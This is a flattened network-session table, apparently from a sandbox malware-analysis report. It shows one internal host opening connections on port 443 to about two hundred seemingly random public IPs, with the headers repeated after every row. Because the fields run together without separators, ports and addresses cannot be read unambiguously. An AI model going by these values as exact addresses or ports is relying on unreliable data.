                                                  20900192.168.2.134048818.38.57.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20901192.168.2.1340076185.55.97.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20902192.168.2.1359700171.241.243.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20903192.168.2.135708873.21.146.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20904192.168.2.135385843.165.65.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20905192.168.2.133961479.68.232.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20906192.168.2.133682694.95.230.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20907192.168.2.1332948180.4.250.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20908192.168.2.1357400219.48.228.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20909192.168.2.1335868102.158.60.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20910192.168.2.134146413.109.205.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20911192.168.2.1348970223.98.204.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20912192.168.2.1355492152.56.192.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20913192.168.2.1359046139.82.140.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20914192.168.2.1336918125.141.238.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20915192.168.2.1336150178.200.140.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20916192.168.2.133344891.173.22.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20917192.168.2.135799866.168.112.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20918192.168.2.1347912186.228.157.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20919192.168.2.1339174206.63.186.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20920192.168.2.1340534139.179.112.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20921192.168.2.1347760106.85.125.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20922192.168.2.1350878106.242.48.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20923192.168.2.135542672.150.116.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20924192.168.2.1360648137.173.180.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20925192.168.2.1344552103.233.12.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20926192.168.2.1344698129.111.93.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20927192.168.2.133688463.203.248.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20928192.168.2.1339438170.137.46.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20929192.168.2.13510448.246.3.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20930192.168.2.1341494149.12.93.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20931192.168.2.134221024.234.171.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20932192.168.2.135931491.120.154.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20933192.168.2.1339410188.190.154.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20934192.168.2.1350552195.255.40.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20935192.168.2.1340742199.141.76.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20936192.168.2.134454246.126.77.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20937192.168.2.1350522184.45.225.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20938192.168.2.134500298.47.210.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20939192.168.2.1334944121.208.127.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20940192.168.2.134856079.117.39.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20941192.168.2.135607290.131.74.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20942192.168.2.135621047.250.206.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20943192.168.2.1335408123.19.153.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20944192.168.2.1351392119.102.10.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20945192.168.2.1342384182.156.31.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20946192.168.2.1356896223.189.196.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20947192.168.2.1335362111.228.201.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20948192.168.2.135729212.134.103.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20949192.168.2.1348672182.213.166.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20950192.168.2.1348062219.176.153.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20951192.168.2.1352158162.230.253.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20952192.168.2.1342678174.109.60.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20953192.168.2.1355458115.136.183.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20954192.168.2.1358864163.82.115.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20955192.168.2.1333662160.121.90.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20956192.168.2.1348802116.55.104.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20957192.168.2.1334018188.87.89.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20958192.168.2.1351572158.209.78.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20959192.168.2.1347606181.86.190.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20960192.168.2.135454049.157.215.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20961192.168.2.134401068.165.70.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20962192.168.2.1355232200.163.198.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20963192.168.2.1351998119.69.125.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20964192.168.2.1346494112.115.52.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20965192.168.2.133939086.205.31.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20966192.168.2.1346580212.208.158.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20967192.168.2.1358318171.84.162.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20968192.168.2.1351108193.226.208.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20969192.168.2.1354754172.123.27.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20970192.168.2.133911631.86.141.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20971192.168.2.135761272.131.167.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20972192.168.2.133350287.72.153.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20973192.168.2.1358256186.50.240.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20974192.168.2.135907662.118.166.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20975192.168.2.1334710103.175.75.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20976192.168.2.135884495.0.183.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20977192.168.2.134312427.247.48.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20978192.168.2.134201277.229.188.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20979192.168.2.1349154131.121.248.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20980192.168.2.134654299.154.79.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20981192.168.2.1342412203.116.211.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20982192.168.2.135609670.187.105.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20983192.168.2.135466088.196.29.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20984192.168.2.1356942117.251.170.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20985192.168.2.1344244163.50.131.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20986192.168.2.1350852213.0.167.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20987192.168.2.1348368223.221.123.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20988192.168.2.1348696202.225.200.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20989192.168.2.1342660111.167.194.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20990192.168.2.1350818210.179.200.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20991192.168.2.1348712114.121.66.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20992192.168.2.133946088.46.210.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20993192.168.2.133285845.114.114.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20994192.168.2.1346068212.83.51.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20995192.168.2.1347716180.95.86.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20996192.168.2.133392037.243.107.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20997192.168.2.1359816196.146.37.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20998192.168.2.1358228168.54.0.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20999192.168.2.1336024110.74.56.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21000192.168.2.1352182186.72.8.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21001192.168.2.1360134204.230.119.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21002192.168.2.133966624.94.51.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21003192.168.2.1336444155.241.213.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21004192.168.2.1341604124.191.129.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21005192.168.2.1355350187.197.84.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21006192.168.2.1345940187.15.195.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21007192.168.2.133621062.148.21.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21008192.168.2.134838685.8.197.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21009192.168.2.1348478133.131.242.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21010192.168.2.1353126217.163.169.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21011192.168.2.134715034.227.46.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21012192.168.2.1359610128.210.254.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21013192.168.2.134935234.162.89.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21014192.168.2.135359269.79.102.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21015192.168.2.135694068.217.27.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21016192.168.2.1352446113.25.169.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21017192.168.2.134968096.43.136.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21018192.168.2.134471850.167.168.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21019192.168.2.1334410108.142.182.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21020192.168.2.1349032153.187.182.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21021192.168.2.134486827.153.244.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21022192.168.2.1333640171.252.187.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21023192.168.2.1336166154.132.182.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21024192.168.2.1343410137.42.37.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21025192.168.2.1339796108.168.166.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21026192.168.2.1334562167.40.157.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21027192.168.2.1352192195.241.25.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21028192.168.2.135421412.44.3.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21029192.168.2.1343146183.246.41.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21030192.168.2.1351914144.245.188.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21031192.168.2.1352354149.172.211.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21032192.168.2.135341879.52.144.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21033192.168.2.1342682103.78.237.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21034192.168.2.133560260.128.76.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21035192.168.2.13496729.250.158.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21036192.168.2.1347874157.205.63.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21037192.168.2.1344068147.243.97.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21038192.168.2.1349920194.210.23.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21039192.168.2.1337420163.185.82.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21040192.168.2.1344292102.91.232.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21041192.168.2.133503897.149.76.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21042192.168.2.1356796207.207.161.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21043192.168.2.1343412216.116.16.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21044192.168.2.1342134205.67.185.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21045192.168.2.134725845.16.140.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21046192.168.2.134531282.186.35.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21047192.168.2.1354790115.211.4.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21048192.168.2.134970873.12.112.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21049192.168.2.134209068.51.21.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21050192.168.2.135492899.178.65.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21051192.168.2.1346514174.13.58.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21052192.168.2.1356328200.80.150.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21053192.168.2.1344664196.132.0.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21054192.168.2.1344650166.243.155.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21055192.168.2.135102888.88.121.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21056192.168.2.1337034172.69.16.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21057192.168.2.1335194210.140.52.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21058192.168.2.133495631.237.145.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21059192.168.2.134706294.172.222.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21060192.168.2.1341044150.74.147.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21061192.168.2.135130825.117.23.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21062192.168.2.1343680182.196.130.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21063192.168.2.1355590223.255.255.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21064192.168.2.1340040108.192.51.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21065192.168.2.13459244.233.191.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21066192.168.2.1349024208.243.244.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21067192.168.2.1353434170.211.198.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21068192.168.2.133730251.200.112.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21069192.168.2.1353518159.84.24.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21070192.168.2.1348934169.65.252.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21071192.168.2.1333264122.116.137.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21072192.168.2.1359588149.103.31.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21073192.168.2.135734688.160.248.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21074192.168.2.134236231.170.49.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21075192.168.2.1337864165.214.111.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21076192.168.2.1344224141.249.23.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21077192.168.2.135025248.149.39.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21078192.168.2.136056477.211.115.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21079192.168.2.135647862.47.157.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21080192.168.2.135513299.57.148.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21081192.168.2.133506839.148.70.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21082192.168.2.135113464.217.246.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21083192.168.2.1352038208.17.66.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21084192.168.2.135068484.174.17.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21085192.168.2.1339148120.199.27.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21086192.168.2.1358682212.232.217.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21087192.168.2.1359870139.146.191.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21088192.168.2.134665266.65.230.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21089192.168.2.133571435.151.35.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21090192.168.2.135120262.214.46.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21091192.168.2.135236670.199.56.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21092192.168.2.1340516193.5.82.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21093192.168.2.134428069.168.166.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21094192.168.2.1356412187.110.63.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21095192.168.2.1338060204.122.253.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21096192.168.2.135297261.15.148.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21097192.168.2.1337690124.18.24.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21098192.168.2.1354576148.160.16.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21099192.168.2.1340906176.189.103.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21100192.168.2.1349282134.198.66.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21101192.168.2.1343018158.181.197.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21102192.168.2.134815217.42.200.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21103192.168.2.1335796142.165.81.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21104192.168.2.134042671.207.207.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21105192.168.2.1337412184.109.26.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21106192.168.2.1359082165.183.225.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21107192.168.2.1333446108.230.102.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21108192.168.2.133973667.252.185.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21109192.168.2.135496017.63.192.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21110192.168.2.134819665.161.74.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21111192.168.2.13490985.172.120.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21112192.168.2.135202462.56.242.251443
